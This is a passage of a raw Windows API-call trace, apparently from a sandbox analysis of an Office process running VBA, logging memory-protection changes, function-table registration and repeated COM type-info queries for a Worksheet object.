0xffffffffffffffff [0157.610] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54fc1, dwSize=0x8) returned 1 [0157.610] GetCurrentProcess () returned 0xffffffffffffffff [0157.610] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54fc0, dwSize=0x8) returned 1 [0157.610] GetCurrentProcess () returned 0xffffffffffffffff [0157.610] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54fd0, dwSize=0x2) returned 1 [0157.610] GetCurrentProcess () returned 0xffffffffffffffff [0157.610] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55024, dwSize=0x55) returned 1 [0157.610] VirtualProtect (in: lpAddress=0x9c55024, dwSize=0x58, flNewProtect=0x40, lpflOldProtect=0x1dc90c | out: lpflOldProtect=0x1dc90c*=0x40) returned 1 [0157.611] GetCurrentProcess () returned 0xffffffffffffffff [0157.611] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c5586c, dwSize=0x4c) returned 1 [0157.611] RtlLookupFunctionEntry (in: ControlPc=0x9c5586c, ImageBase=0x1dc7f8, HistoryTable=0x1dc800 | out: ImageBase=0x1dc7f8, HistoryTable=0x1dc800) returned 0x0 [0157.611] VirtualProtect (in: lpAddress=0x9c5586c, dwSize=0x50, flNewProtect=0x40, lpflOldProtect=0x1dc8fc | out: lpflOldProtect=0x1dc8fc*=0x40) returned 1 [0157.612] RtlAddFunctionTable (FunctionTable=0x9c558c8, EntryCount=0x1, BaseAddress=0x9c55800, TargetGp=0x1dc8fc) returned 1 [0157.612] GetCurrentProcess () returned 0xffffffffffffffff [0157.612] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55924, dwSize=0x75) returned 1 [0157.612] RtlLookupFunctionEntry (in: ControlPc=0x9c55924, ImageBase=0x1dc7f8, HistoryTable=0x1dc800 | out: ImageBase=0x1dc7f8, HistoryTable=0x1dc800) returned 0x0 [0157.613] VirtualProtect (in: lpAddress=0x9c55924, dwSize=0x78, flNewProtect=0x40, lpflOldProtect=0x1dc8fc | out: lpflOldProtect=0x1dc8fc*=0x40) returned 1 [0157.613] RtlAddFunctionTable (FunctionTable=0x9c559a8, EntryCount=0x1, BaseAddress=0x9c55900, TargetGp=0x1dc8fc) returned 1 [0157.613] SetErrorMode (uMode=0x8001) returned 0x8001 [0157.613] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0157.614] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee4e20000 [0157.614] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10027a1e00000ccb) returned 1 [0157.614] SetErrorMode (uMode=0x8001) returned 0x8001 [0157.615] GetProcAddress (hModule=0x7fee4e20000, lpProcName=0x2cc) returned 0x7fee51624c8 [0157.615] GetCurrentProcess () returned 0xffffffffffffffff [0157.615] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55af4, dwSize=0x4b) returned 1 [0157.615] RtlLookupFunctionEntry (in: ControlPc=0x9c55af4, ImageBase=0x1dc798, HistoryTable=0x1dc7a0 | out: ImageBase=0x1dc798, HistoryTable=0x1dc7a0) returned 0x0 [0157.615] VirtualProtect (in: lpAddress=0x9c55af4, dwSize=0x4c, flNewProtect=0x40, lpflOldProtect=0x1dc89c | out: lpflOldProtect=0x1dc89c*=0x40) returned 1 [0157.616] RtlAddFunctionTable (FunctionTable=0x9c55b4c, EntryCount=0x1, BaseAddress=0x9c55a00, TargetGp=0x1dc89c) returned 1 [0157.616] GetCurrentProcess () returned 0xffffffffffffffff [0157.616] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55b90, dwSize=0x5c) returned 1 [0157.616] RtlLookupFunctionEntry (in: ControlPc=0x9c55b90, ImageBase=0x1dc7f8, HistoryTable=0x1dc800 | out: ImageBase=0x1dc7f8, HistoryTable=0x1dc800) returned 0x0 [0157.616] VirtualProtect (in: lpAddress=0x9c55b90, dwSize=0x60, flNewProtect=0x40, lpflOldProtect=0x1dc8fc | out: lpflOldProtect=0x1dc8fc*=0x40) returned 1 [0157.617] RtlAddFunctionTable (FunctionTable=0x9c55bfc, EntryCount=0x1, BaseAddress=0x9c55b00, TargetGp=0x1dc8fc) returned 1 [0157.617] GetCurrentProcess () returned 0xffffffffffffffff [0157.617] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55dd4, dwSize=0x54) returned 1 [0157.617] RtlLookupFunctionEntry (in: ControlPc=0x9c55dd4, ImageBase=0x1dc7f8, HistoryTable=0x1dc800 | out: ImageBase=0x1dc7f8, HistoryTable=0x1dc800) returned 0x0 [0157.617] VirtualProtect (in: lpAddress=0x9c55dd4, dwSize=0x58, flNewProtect=0x40, lpflOldProtect=0x1dc8fc | out: lpflOldProtect=0x1dc8fc*=0x40) returned 1 [0157.618] RtlAddFunctionTable (FunctionTable=0x9c55e38, EntryCount=0x1, BaseAddress=0x9c55d00, TargetGp=0x1dc8fc) returned 1 [0157.618] SetErrorMode (uMode=0x8001) returned 0x8001 [0157.618] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0157.618] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee4e20000 [0157.619] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10027a1e00000ccc) returned 1 [0157.619] SetErrorMode (uMode=0x8001) returned 0x8001 [0157.620] GetProcAddress (hModule=0x7fee4e20000, lpProcName=0x269) returned 0x7fee4f8d48c [0157.620] GetCurrentProcess () returned 0xffffffffffffffff [0157.620] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55f54, dwSize=0x4b) returned 1 [0157.620] RtlLookupFunctionEntry (in: ControlPc=0x9c55f54, ImageBase=0x1dc798, HistoryTable=0x1dc7a0 | out: ImageBase=0x1dc798, HistoryTable=0x1dc7a0) returned 0x0 [0157.620] VirtualProtect (in: lpAddress=0x9c55f54, dwSize=0x4c, flNewProtect=0x40, lpflOldProtect=0x1dc89c | out: lpflOldProtect=0x1dc89c*=0x40) returned 1 [0157.621] RtlAddFunctionTable (FunctionTable=0x9c55fac, EntryCount=0x1, BaseAddress=0x9c55f00, TargetGp=0x1dc89c) returned 1 [0157.621] SetErrorMode (uMode=0x8001) returned 0x8001 [0157.621] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0157.621] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee4e20000 [0157.622] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10027a1e00000ccd) returned 1 [0157.622] SetErrorMode (uMode=0x8001) returned 0x8001 [0157.622] GetProcAddress (hModule=0x7fee4e20000, lpProcName=0x2c8) returned 0x7fee51a9db0 [0157.622] GetCurrentProcess () returned 0xffffffffffffffff [0157.622] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c563f8, dwSize=0x73) returned 1 [0157.622] RtlLookupFunctionEntry (in: ControlPc=0x9c563f8, ImageBase=0x1dc798, HistoryTable=0x1dc7a0 | out: ImageBase=0x1dc798, HistoryTable=0x1dc7a0) returned 0x0 [0157.623] VirtualProtect (in: lpAddress=0x9c563f8, dwSize=0x74, flNewProtect=0x40, lpflOldProtect=0x1dc89c | out: lpflOldProtect=0x1dc89c*=0x4) returned 1 [0157.623] RtlAddFunctionTable (FunctionTable=0x9c56478, EntryCount=0x1, BaseAddress=0x9c56300, TargetGp=0x1dc89c) returned 1 [0157.623] GetCurrentProcess () returned 0xffffffffffffffff [0157.623] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c56518, dwSize=0x5c) returned 1 [0157.623] RtlLookupFunctionEntry (in: ControlPc=0x9c56518, ImageBase=0x1dc7f8, HistoryTable=0x1dc800 | out: ImageBase=0x1dc7f8, HistoryTable=0x1dc800) returned 0x0 [0157.623] VirtualProtect (in: lpAddress=0x9c56518, dwSize=0x60, flNewProtect=0x40, lpflOldProtect=0x1dc8fc | out: lpflOldProtect=0x1dc8fc*=0x40) returned 1 [0157.624] RtlAddFunctionTable (FunctionTable=0x9c56584, EntryCount=0x1, BaseAddress=0x9c56400, TargetGp=0x1dc8fc) returned 1 [0157.624] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0157.624] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddcc8 | out: ppvObject=0x1ddcc8*=0x0) returned 0x80004002 [0157.624] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddcc0 | out: ppvObject=0x1ddcc0*=0x0) returned 0x80004002 [0157.624] IUnknown:Release (This=0xa02b108) returned 0x4 [0157.625] IUnknown:AddRef (This=0xa02b160) returned 0x6 [0157.625] IUnknown:QueryInterface (in: This=0xa02b160, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddcc8 | out: ppvObject=0x1ddcc8*=0x0) returned 0x80004002 [0157.625] IUnknown:QueryInterface (in: This=0xa02b160, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddcc0 | out: ppvObject=0x1ddcc0*=0x0) returned 0x80004002 [0157.625] IUnknown:Release (This=0xa02b160) returned 0x5 [0157.625] IUnknown:AddRef (This=0xa02b058) returned 0x2 [0157.625] IUnknown:QueryInterface (in: This=0xa02b058, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddcc8 | out: ppvObject=0x1ddcc8*=0x0) returned 0x80004002 [0157.625] IUnknown:QueryInterface (in: This=0xa02b058, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddcc0 | out: ppvObject=0x1ddcc0*=0x0) returned 0x80004002 [0157.625] IUnknown:Release (This=0xa02b058) returned 0x1 [0157.625] IUnknown:AddRef (This=0xa02b420) returned 0x5 [0157.625] IUnknown:QueryInterface (in: This=0xa02b420, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddcc8 | out: ppvObject=0x1ddcc8*=0x0) returned 0x80004002 [0157.625] IUnknown:QueryInterface (in: This=0xa02b420, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddcc0 | out: ppvObject=0x1ddcc0*=0x0) returned 0x80004002 [0157.625] IUnknown:Release (This=0xa02b420) returned 0x4 [0157.625] IUnknown:AddRef (This=0xa121118) returned 0x3 [0157.625] IUnknown:QueryInterface (in: This=0xa121118, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddcc8 | out: ppvObject=0x1ddcc8*=0x0) returned 0x80004002 [0157.625] IUnknown:QueryInterface (in: This=0xa121118, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddcc0 | out: ppvObject=0x1ddcc0*=0x0) returned 0x80004002 [0157.625] IUnknown:Release (This=0xa121118) returned 0x2 [0157.625] IUnknown:AddRef (This=0xa121698) returned 0x4 [0157.625] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddcc8 | out: ppvObject=0x1ddcc8*=0x0) returned 0x80004002 [0157.625] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddcc0 | out: ppvObject=0x1ddcc0*=0x0) returned 0x80004002 [0157.625] IUnknown:Release (This=0xa121698) returned 0x3 [0157.625] IUnknown:AddRef (This=0xa02ae48) returned 0x5 [0157.625] IUnknown:QueryInterface (in: This=0xa02ae48, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddcc8 | out: ppvObject=0x1ddcc8*=0x0) returned 0x80004002 [0157.625] IUnknown:QueryInterface (in: This=0xa02ae48, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddcc0 | out: ppvObject=0x1ddcc0*=0x0) returned 0x80004002 [0157.625] IUnknown:Release (This=0xa02ae48) returned 0x4 [0157.625] GetAsyncKeyState (vKey=27) returned 0 [0157.671] VarBstrCat (in: bstrLeft="A", bstrRight="1", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0157.693] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0xa267610 [0157.693] IUnknown:AddRef (This=0xa02b210) returned 0x3 [0157.693] IUnknown:QueryInterface (in: This=0xa02b210, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dd670 | out: ppvObject=0x1dd670*=0x0) returned 0x80004002 [0157.693] IUnknown:AddRef (This=0xa02b2c0) returned 0x3 [0157.693] IUnknown:AddRef (This=0xa02b318) returned 0x3 [0157.693] IUnknown:QueryInterface (in: This=0xa02b210, riid=0x7fee51c40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1dd5b8 | out: ppvObject=0x1dd5b8*=0xa02b210) returned 0x0 [0157.693] ITypeInfo2:GetCustData (in: This=0xa02b210, GUID=0x7fee51cd970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x1dd5c8 | out: pVarVal=0x1dd5c8*(varType=0x0, wReserved1=0x1d, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0157.693] IUnknown:Release (This=0xa02b210) returned 0x3 [0157.693] ITypeInfo:RemoteGetDocumentation (in: This=0xa02b210, memid=-1, refPtrFlags=0x1dd5c0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1dd5e0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1dd5e0*="") returned 0x0 [0157.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Worksheet", cchWideChar=10, lpMultiByteStr=0x1dd4d0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Worksheet", lpUsedDefaultChar=0x0) returned 10 [0157.693] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Worksheet") returned 0x10fec1 [0157.693] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b2c0, ppTypeAttr=0x1dd5c0, pDummy=0x0 | out: ppTypeAttr=0x1dd5c0, pDummy=0x0) returned 0x0 [0157.693] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b2c0) returned 0x0 [0157.693] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x0, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.693] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.693] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x1, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.694] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.694] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x2, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.694] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.694] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x3, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.694] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.694] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x4, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.694] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.694] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x5, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.694] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.694] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x6, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.694] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.694] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x7, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.694] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.694] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x8, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.694] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.694] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x9, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.694] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.694] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0xa, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.694] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.694] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0xb, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.694] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.694] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0xc, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.694] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.694] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0xd, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.694] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.694] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0xe, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.694] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.694] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0xf, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.694] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.694] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x10, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.694] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.695] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x11, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.695] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.695] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x12, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.695] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.695] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x13, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.695] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.695] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x14, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.695] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.695] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x15, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.695] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.695] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x16, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.695] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.695] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x17, ppFuncDesc=0x1dd598, pDummy=0x1a0 | out: ppFuncDesc=0x1dd598, pDummy=0x1a0) returned 0x0 [0157.695] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.695] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x18, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.695] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.695] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x19, ppFuncDesc=0x1dd598, pDummy=0x1a0 | out: ppFuncDesc=0x1dd598, pDummy=0x1a0) returned 0x0 [0157.695] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.695] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x1a, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.695] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.695] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x1b, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.695] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.695] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x1c, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.695] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.695] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x1d, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.695] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.695] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x1e, ppFuncDesc=0x1dd598, pDummy=0x160 | out: ppFuncDesc=0x1dd598, pDummy=0x160) returned 0x0 [0157.695] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.695] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x1f, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.696] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.696] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x20, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.696] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.696] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x21, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.696] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.696] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x22, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.696] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.696] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x23, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.696] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.696] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x24, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.696] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.696] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x25, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.696] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.696] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x26, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.696] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.696] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x27, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.696] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.696] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x28, ppFuncDesc=0x1dd598, pDummy=0x50 | out: 